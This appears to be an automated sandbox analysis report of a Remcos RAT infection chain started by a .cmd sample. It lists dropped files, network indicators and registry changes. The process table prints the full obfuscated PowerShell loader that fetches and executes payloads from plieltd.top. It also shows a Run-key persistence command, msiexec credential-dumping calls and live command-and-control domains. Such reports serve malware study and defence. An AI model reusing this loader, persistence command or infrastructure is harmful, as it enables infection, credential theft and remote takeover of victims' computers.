Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
rIMG465244247443GULFORDEROpmagasinering.cmd
|
ASCII text, with very long lines (6138), with no line terminators
|
initial sample
|
||
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\biljl.vbs
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhrkykzt.iy5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pf2hhutw.l1c.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vd4vqodm.w5c.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z32uhnbf.ph5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhvF678.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x57c24073, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\pvaqv
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y9CC0PCII26P6XS9DIN2.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Rafting.Ans
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMG465244247443GULFORDEROpmagasinering.cmd" "
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated
amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If
($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous
-lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function
Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over
';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy
e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar
eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre
0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian
' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr
DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian
'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB
SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a
esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT
T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA
olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou
PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE
FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa
iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT
rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian
'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT
lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner
($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. S rHUpbre araOmkrdUdfoeInter
eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie
Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH
pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned
Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner
(Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS
T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139)
{Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi
') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an
');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa
gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian
'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso
.chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog
BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner
(Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio
Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner (Abkhasian ' Kur$flyvg
AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh
fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C
sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i
BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa
nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla
');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif
Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS
EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens
Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard
#>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes;
for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function
Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over
';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy
e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar
eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre
0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian
' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr
DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian
'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB
SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a
esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT
T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA
olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou
PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE
FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa
iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT
rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian
'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT
lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner
($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. S rHUpbre araOmkrdUdfoeInter
eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie
Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH
pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned
Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner
(Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS
T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139)
{Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi
') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an
');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa
gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian
'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso
.chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog
BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner
(Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio
Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner (Abkhasian ' Kur$flyvg
AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh
fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C
sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i
BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa
nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla
');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif
Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS
EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pvaqv"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sxfiolkk"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\crtbpevmxvde"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ
/d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle
1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
|
There are 4 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://plieltd.top
|
unknown
|
||
http://www.imvu.comr
|
unknown
|
||
http://www.microsoft.cw
|
unknown
|
||
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
|
unknown
|
||
http://www.imvu.comta
|
unknown
|
||
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
|
unknown
|
||
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://www.nirsoft.net
|
unknown
|
||
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
|
unknown
|
||
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
|
unknown
|
||
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
|
unknown
|
||
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
|
unknown
|
||
https://www.google.com
|
unknown
|
||
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
|
unknown
|
||
http://geoplugin.net/json.gpH
|
unknown
|
||
https://maps.windows.com/windows-app-web-link
|
unknown
|
||
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://geoplugin.net/json.gpT
|
unknown
|
||
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
|
unknown
|
||
https://login.yahoo.com/config/login
|
unknown
|
||
http://www.nirsoft.net/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
|
unknown
|
||
https://plieltd.top/Underbyggelse.aaf
|
172.67.155.139
|
||
https://plieltd.top/FevmSBTRsrPt160.bin
|
172.67.155.139
|
||
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
|
unknown
|
||
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
|
unknown
|
||
https://www.office.com/
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
|
unknown
|
||
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
|
unknown
|
||
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://geoplugin.net/json.gpl
|
unknown
|
||
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
|
unknown
|
||
https://plieltd.top
|
unknown
|
||
http://geoplugin.net/json.gpk
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://plieltd.top/Underbyggelse.aafP
|
unknown
|
||
http://crl.microB
|
unknown
|
||
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
|
unknown
|
||
http://www.imvu.com
|
unknown
|
||
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://geoplugin.net/json.gpt
|
unknown
|
||
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
|
unknown
|
||
http://geoplugin.net/json.gpz
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
|
unknown
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
|
unknown
|
||
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
|
unknown
|
||
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
|
unknown
|
||
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
|
unknown
|
||
https://www.google.com/accounts/servicelogin
|
unknown
|
||
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
|
unknown
|
||
https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
|
unknown
|
||
https://plieltd.top/Underbyggelse.aafXR$lX
|
unknown
|
||
https://aka.ms/pscore6lBtq
|
unknown
|
||
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
|
unknown
|
||
http://www.ebuddy.com
|
unknown
|
There are 63 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
pelele.duckdns.org
|
185.236.203.101
|
||
plieltd.top
|
172.67.155.139
|
||
geoplugin.net
|
178.237.33.50
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
185.236.203.101
|
pelele.duckdns.org
|
Romania
|
||
172.67.155.139
|
plieltd.top
|
United States
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Darksomeness
|
Subtropiske
|
||
HKEY_CURRENT_USER\Environment
|
Assumably
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
exepath
|
||
